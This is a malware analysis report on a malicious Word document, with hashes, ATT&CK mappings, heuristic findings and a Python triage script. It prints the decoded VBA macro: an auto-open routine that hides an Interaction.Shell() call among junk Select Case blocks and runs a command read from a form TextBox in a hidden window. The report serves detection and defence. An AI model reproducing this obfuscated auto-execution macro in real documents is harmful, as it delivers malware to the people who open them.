Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 a26f660ca616dc12…

MALICIOUS

Office (OLE)

Size: 142.8 KB
Created: 2018-12-20 12:01:00
Authoring application: Microsoft Office Word
First seen: 2020-02-04
MD5: d846c5f0a61e7a1b1396855fc9d4a4a4
SHA-1: 902212e221b17b87ab35bf8e122c92e14da0a7c8
SHA-256: a26f660ca616dc12f094261b02be1b4d70dff1fa2c1d15eb3f7b8b590e1b3754
Risk score: 250

Malware Insights

MITRE ATT&CK
  • T1059.005 Command and Scripting Interpreter: Visual Basic
  • T1059 Command and Scripting Interpreter
  • T1204.002 User Execution: Malicious File

The sample is a Word document carrying a VBA project. Its 'autoopen' procedure runs when the document is opened and calls Q940909699, whose only effective statement is the Interaction.Shell() call; the surrounding Select Case blocks switch on variables that are never assigned and exist only to bury that call. The command string handed to Shell() is assembled at run time from variables that are never assigned anywhere in the visible source (under On Error Resume Next they stay Empty and contribute nothing to the concatenation) joined with the contents of the form control N511476276586.TextBox1, so the actual command line is stored in the document's form control data rather than in the macro text. The window-style argument is written as 23 - 23, which folds to 0 (vbHide), so the spawned process runs with no visible window. The SC_STR_CMD and OLE_VBA_PCODE_AUTOEXEC_EXEC heuristic firings corroborate the execution intent from the string and p-code sides. The primary IOC is the VBA macro module itself; the command line should be recovered from the stored TextBox1 value before any network indicators are derived from this sample.

Heuristics 8

  • ClamAV: Doc.Downloader.Generic-6790262-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Downloader.Generic-6790262-0
  • VBA macros detected medium 3 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • Shell() call in VBA critical OLE_VBA_SHELL
    Shell() call in VBA
    Matched line in script
          End Select
    w442033210 = Array(U74168, l327164, w32741, Interaction.Shell(CVar("" + F97349984 + T727823 + F735426 + T60320451 + B4399186 + N511476276586.TextBox1) + v26841 + j6039134 + u39168045 + o18947100, 23 - 23), s123878)
       Select Case w9052468710557176
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • AutoOpen macro low OLE_VBA_AUTOOPEN
    AutoOpen macro
    Matched line in script
    Attribute VB_Control = "TextBox1, 0, 0, MSForms, TextBox"
    Sub autoopen()
    Q940909699
  • Suspicious cmd.exe invocation with execution flag high SC_STR_CMD
    Suspicious cmd.exe invocation with execution flag
  • Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen. The generic description of this heuristic assumes no modern VBA project was recovered and no stronger macro-virus family marker was present; in this sample the VBA project was recovered (see Extracted artifacts below), so the finding only restates the AutoOpen entry point already reported as OLE_VBA_AUTOOPEN. It is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://schemas.openxmlformats.org/drawingml/2006/main (in document text, OLE body). This is the standard DrawingML XML namespace identifier carried by embedded drawing parts; it is not contacted at run time and is not a network IOC for this sample.
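The Python script below is an added example, not part of this report or of oletools; it shows the checks behind the findings above run over the decisive lines of the extracted macros.bas (a constructed sample, with the repeated junk Select Case blocks cut down to one). It finds the auto-exec entry point, locates the Shell() call, folds the window-style argument to 0 (vbHide), and shows that every operand of the command string except the N511476276586.TextBox1 control is an identifier nothing in the source assigns. The regexes, the ShellCall structure and the dead-switch count are this example's own, not a detection engine's.

```python
"""Triage an olevba-extracted VBA module: auto-exec entry points, Shell() calls and where the command comes from."""
import ast
import operator
import re
from dataclasses import dataclass
from typing import List, Optional

# Constructed sample: the decisive lines of macros.bas from this report, with the
# repeated junk Select Case blocks reduced to one. Nothing else is changed.
SAMPLE_VBA = '''Attribute VB_Name = "N511476276586"
Attribute VB_Control = "TextBox1, 0, 0, MSForms, TextBox"
Sub autoopen()
Q940909699
End Sub

Attribute VB_Name = "H005373101410"
Function Q940909699()
On Error Resume Next
   Select Case M809069905455878377270891
         Case 240883173
      End Select
w442033210 = Array(U74168, l327164, w32741, Interaction.Shell(CVar("" + F97349984 + T727823 + F735426 + T60320451 + B4399186 + N511476276586.TextBox1) + v26841 + j6039134 + u39168045 + o18947100, 23 - 23), s123878)
End Function
'''

AUTOEXEC_RE = re.compile(r"^\s*(?:Public\s+|Private\s+)?(?:Sub|Function)\s+"
                         r"(autoopen|auto_open|autoexec|autoclose|document_open|document_close|workbook_open)\b",
                         re.I | re.M)
SHELL_RE = re.compile(r"\b(?:Interaction\.|VBA\.)?Shell\s*\(", re.I)
ASSIGN_RE = re.compile(r"^\s*(?:Set\s+)?([A-Za-z_]\w*)\s*=", re.M)
SELECT_RE = re.compile(r"^\s*Select\s+Case\s+([A-Za-z_]\w*)\s*$", re.I | re.M)
CONTROL_RE = re.compile(r"\b([A-Za-z_]\w*)\.(TextBox\w*|Label\w*|Caption|Tag|Text|Value)\b")
IDENT_RE = re.compile(r"\b[A-Za-z_]\w*\b")
BUILTINS = {"CVar", "CStr", "CInt", "CByte", "Array", "Interaction", "Shell", "VBA"}
# VbAppWinStyle values accepted by Shell(); 0 hides the spawned process window.
WIN_STYLE = {0: "vbHide", 1: "vbNormalFocus", 2: "vbMinimizedFocus",
             3: "vbMaximizedFocus", 4: "vbNormalNoFocus", 6: "vbMinimizedNoFocus"}
_OPS = {ast.Add: operator.add, ast.Sub: operator.sub, ast.Mult: operator.mul}

@dataclass
class ShellCall:
    command_expr: str            # first argument exactly as written in the source
    window_style: Optional[int]  # None if omitted or not a numeric constant
    form_controls: List[str]     # e.g. "N511476276586.TextBox1"
    unresolved: List[str]        # identifiers in the command that no statement assigns

def split_call_args(src: str, open_paren: int) -> List[str]:
    """Top-level comma-separated arguments of the call whose '(' sits at open_paren."""
    depth, in_str, start, args = 0, False, open_paren + 1, []
    for i, ch in enumerate(src[open_paren:], open_paren):
        if ch == '"':
            in_str = not in_str
        elif in_str:
            continue
        elif ch == "(":
            depth += 1
        elif ch == ")" and (depth := depth - 1) == 0:
            return args + [src[start:i].strip()]
        elif ch == "," and depth == 1:
            args.append(src[start:i].strip())
            start = i + 1
    raise ValueError("unbalanced parentheses in call")

def const_int(expr: str) -> Optional[int]:
    """Fold a purely numeric expression such as '23 - 23'; names or calls give None."""
    def ev(n):
        if isinstance(n, ast.Constant) and isinstance(n.value, int):
            return n.value
        if isinstance(n, ast.BinOp) and type(n.op) in _OPS:
            return _OPS[type(n.op)](ev(n.left), ev(n.right))
        raise ValueError("not a numeric constant")
    try:
        return ev(ast.parse(expr.strip(), mode="eval").body)
    except (SyntaxError, ValueError):
        return None

def find_shell_calls(src: str) -> List[ShellCall]:
    assigned = {m.group(1) for m in ASSIGN_RE.finditer(src)}
    calls = []
    for m in SHELL_RE.finditer(src):
        args = split_call_args(src, m.end() - 1)
        cmd = args[0]
        controls = ["%s.%s" % pair for pair in CONTROL_RE.findall(cmd)]
        # Under On Error Resume Next a never-assigned variable stays Empty and adds nothing.
        idents = dict.fromkeys(IDENT_RE.findall(CONTROL_RE.sub("", cmd)))
        unresolved = [i for i in idents if i not in assigned and i not in BUILTINS]
        style = const_int(args[1]) if len(args) > 1 else None
        calls.append(ShellCall(cmd, style, controls, unresolved))
    return calls

def dead_select_blocks(src: str) -> int:
    """Select Case statements whose selector is never assigned: junk control flow."""
    assigned = {m.group(1) for m in ASSIGN_RE.finditer(src)}
    return sum(1 for m in SELECT_RE.finditer(src) if m.group(1) not in assigned)

def triage(src: str) -> dict:
    return {
        "auto_exec": sorted({m.group(1).lower() for m in AUTOEXEC_RE.finditer(src)}),
        "shell_calls": find_shell_calls(src),
        "dead_select_blocks": dead_select_blocks(src),
    }
```

Run it on any decoded olevba output with triage(open(path).read()). When unresolved covers every non-control operand, as it does here, the command line lives in the form control and has to be pulled from the document's form storage rather than the macro text. The count of Select Case statements on never-assigned selectors is a cheap junk-code score for macros padded this way.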

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename     Kind        Source                                                Size
macros.bas   vba-macro   oletools.olevba.extract_macros (decoded VBA source)   5291 bytes
SHA-256: f90231113be2c529d531e7ebef8c1feb3e3821eba69d2f8301730615b15578d0
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "N511476276586"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Control = "TextBox1, 0, 0, MSForms, TextBox"
Sub autoopen()
Q940909699
End Sub

Attribute VB_Name = "H005373101410"
Function Q940909699()
On Error Resume Next
   Select Case M809069905455878377270891
         Case 240883173
         h7762 = U2194
            z213 = CInt(N0349 / CByte(J5494))
            w283 = M2403
         Case 258638999
         j799 = l068
         i1538 = V2891
           C8621 = CInt(v9903 / CByte(n394))
         Case 30589623
         t8606 = r6530
         Y9186 = O371
      End Select
   Select Case G436688716295627080083694
         Case 20970485
         M0850 = N4061
            u6124 = CInt(i6680 / CByte(X452))
            t4359 = m313
         Case 76258916
         K310 = A571
         v754 = w717
           E612 = CInt(J1140 / CByte(h544))
         Case 184094862
         M4315 = i5605
         n717 = H729
      End Select
   Select Case C2322732186771235471
         Case 212926280
         v9339 = v4569
            q7187 = CInt(O9336 / CByte(O9192))
            q9943 = u097
         Case 92805054
         O0823 = H770
         o4734 = z6137
           A7558 = CInt(n0766 / CByte(f2277))
         Case 234950648
         F912 = d1609
         J673 = b8149
      End Select
   Select Case r054825412401741406647
         Case 57272088
         s766 = j219
            C251 = CInt(z1977 / CByte(a7502))
            a654 = m351
         Case 207244861
         w5141 = c2634
         Z6065 = w273
           j559 = CInt(X3764 / CByte(r374))
         Case 156210951
         s8622 = z943
         G2548 = V062
      End Select
w442033210 = Array(U74168, l327164, w32741, Interaction.Shell(CVar("" + F97349984 + T727823 + F735426 + T60320451 + B4399186 + N511476276586.TextBox1) + v26841 + j6039134 + u39168045 + o18947100, 23 - 23), s123878)
   Select Case w9052468710557176
         Case 135977553
         f185 = I6284
            d658 = CInt(E3464 / CByte(k1981))
            L873 = q9224
         Case 65451356
         i394 = Y5178
         X3987 = j601
           v0899 = CInt(d7781 / CByte(w124))
         Case 169394394
         U145 = K0013
         a9321 = w687
      End Select
   Select Case w1425596027819460
         Case 285919674
         B819 = q917
            A411 = CInt(D3479 / CByte(s608))
            M997 = N2375
         Case 320079340
         F464 = J086
         W9134 = w2321
           i130 = CInt(m3952 / CByte(E344))
         Case 300834575
         T0086 = z750
         M539 = C862
      End Select
End Function


Attribute VB_Name = "Y73470006"

Attribute VB_Name = "q21417344827"

Attribute VB_Name = "P0379840861314"

Attribute VB_Name = "z6205818700"

Attribute VB_Name = "U40354184"

Attribute VB_Name = "N946386089"

Attribute VB_Name = "Z14605009484"

Attribute VB_Name = "f06879876555051"
Attribute VB_Base = "0{FCFB3D2A-A0FA-1068-A738-08002B3371B5}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = False
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False

Attribute VB_Name = "i953292349"
Attribute VB_Base = "0{FCFB3D2A-A0FA-1068-A738-08002B3371B5}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = False
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False

Attribute VB_Name = "F04280021288592"
Attribute VB_Base = "0{FCFB3D2A-A0FA-1068-A738-08002B3371B5}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = False
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False

Attribute VB_Name = "z6916946"
Attribute VB_Base = "0{FCFB3D2A-A0FA-1068-A738-08002B3371B5}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = False
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False

Attribute VB_Name = "F5630385523"
Attribute VB_Base = "0{FCFB3D2A-A0FA-1068-A738-08002B3371B5}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = False
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False

Attribute VB_Name = "A2252893783"
Attribute VB_Base = "0{FCFB3D2A-A0FA-1068-A738-08002B3371B5}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = False
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False

Attribute VB_Name = "m962170598"
Attribute VB_Base = "0{FCFB3D2A-A0FA-1068-A738-08002B3371B5}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = False
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False